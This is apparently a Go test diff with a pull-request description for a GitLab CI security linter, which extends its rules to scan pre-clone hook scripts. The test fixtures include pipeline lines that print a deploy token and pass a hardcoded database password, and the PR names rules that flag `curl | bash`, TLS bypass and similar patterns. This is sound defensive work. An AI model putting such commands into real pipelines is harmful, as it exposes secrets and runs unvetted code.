+func TestHooks_GL021_PrintedSecret(t *testing.T) {
+	// Hand-rolled rule with block-scalar splitting + job hooks.
+	f := runRuleSrc(t, GL021, `
+job1:
+  hooks:
+    pre_get_sources_script:
+      - echo $DEPLOY_TOKEN
+  script:
+    - echo run
+`)
+	if len(f) != 1 {
+		t.Fatalf("expected GL021 to flag printed secret in hooks, got %d", len(f))
+	}
+}
+
+func TestHooks_GL044_MRSourceSHA(t *testing.T) {
+	// Hand-rolled, job-only, subset of keys + job hooks.
+	f := runRuleSrc(t, GL044, `
+job1:
+  rules:
+    - if: '$CI_PIPELINE_SOURCE == "merge_request_event"'
+  hooks:
+    pre_get_sources_script:
+      - git checkout $CI_MERGE_REQUEST_SOURCE_BRANCH_SHA
+  script:
+    - echo run
+`)
+	if len(f) != 1 {
+		t.Fatalf("expected GL044 to flag MR source SHA checkout in hooks, got %d", len(f))
+	}
+}
+
+func TestHooks_GL038_HardcodedCred(t *testing.T) {
+	f := runRuleSrc(t, GL038, `
+default:
+  hooks:
+    pre_get_sources_script:
+      - mysqldump --password=ExampleP4ss! mydb > dump.sql
+job1:
+  script:
+    - echo run
+`)
+	if len(f) == 0 {
+		t.Fatalf("expected GL038 to flag hardcoded credential in default hooks, got %d", len(f))
+	}
+}


### PR DESCRIPTION
Closes #330

## Problem

`hooks:pre_get_sources_script` runs shell commands on the runner **before** the repo is cloned, but no script-scanning rule looked at it. Every script rule (GL011 `curl | bash`, GL021 printed secret, GL038 hardcoded credential, GL042 TLS bypass, GL068 `set -x`, …) could be bypassed by moving the command there.

## Change

### Core helpers (the fix lands everywhere at once)
- **`rules/helpers.go`**: added `hookScriptNode()` (resolves the nested `hooks:` → `pre_get_sources_script:` node) and a new **`EachScriptBlock`** that visits every script *sequence node* — global `before/after_script`, `default:` `before/after_script` + hooks, and each job's `script/before_script/after_script` + hooks. `EachScriptLine` is now a thin wrapper over it, so all ~15 rules already using it gain hooks coverage for free. `CollectJobScriptLines` now also includes job hooks (covers GL020/22/23/24/25/26/45).
- **`internal/shellcheck/shellcheck.go`**: lints `hooks:pre_get_sources_script` at job and `default:` level.

`hooks:` is not a valid top-level keyword, so it is visited only under `default:` and jobs.

### Rule migrations (behaviour-preserving)
Migrated the hand-rolled `for key := range {script, before_script, after_script}` loops onto `EachScriptBlock`: **GL002, GL004, GL011, GL015, GL029, GL030, GL032, GL035, GL038, GL039, GL040** (deletes ~20 lines of boilerplate each; `EachScriptBlock` visits the exact same scopes in the same order).

Kept hand-rolled but extended with the hooks node (interleaved with non-script checks, special scope, or block-scalar splitting):
- **GL016, GL042, GL051** — interleaved with `variables:` / `image:` / `services:`; hooks added to `default:` + per-job.
- **GL014, GL021, GL044** — job-only by design (and GL021 splits block scalars, GL044 deliberately skips `after_script`); hooks added at job level, preserving their existing scope and key order.

## Acceptance criteria
- ✅ A pattern flagged in `script:` is also flagged in `hooks:pre_get_sources_script` (job + `default:`)
- ✅ No finding/severity/line changes for existing keys — verified by an **FP-corpus diff** (see below)
- ✅ Hand-rolled loops migrated to the shared helper where behaviour-preserving
- ✅ shellcheck covers the hooks script
- ✅ Tests: helper coverage (`EachScriptLine`/`EachScriptBlock`/`CollectJobScriptLines`) + representative rules across every path (GL011 migrated, GL068 EachScriptLine, GL022 CollectJobScriptLines, GL021/GL044 hand-rolled, GL038/GL042 default-level)

## How to test
- `go test ./...` — new `rules/hooks_test.go` plus all existing tests pass.
- `golangci-lint run ./...` — clean.

## Regression / FP scan
Diffed the full findings output across ~200 real top-starred public GitLab pipelines, before vs after: **2345 findings before, 2345 after, zero diff** — no behaviour change for existing keys. One corpus file actually uses `pre_get_sources_script` (`git config --system core.autocrlf false`); it is benign and correctly not flagged, so the empty diff is expected. New-finding behaviour in hooks is proven by the unit tests with malicious hook content.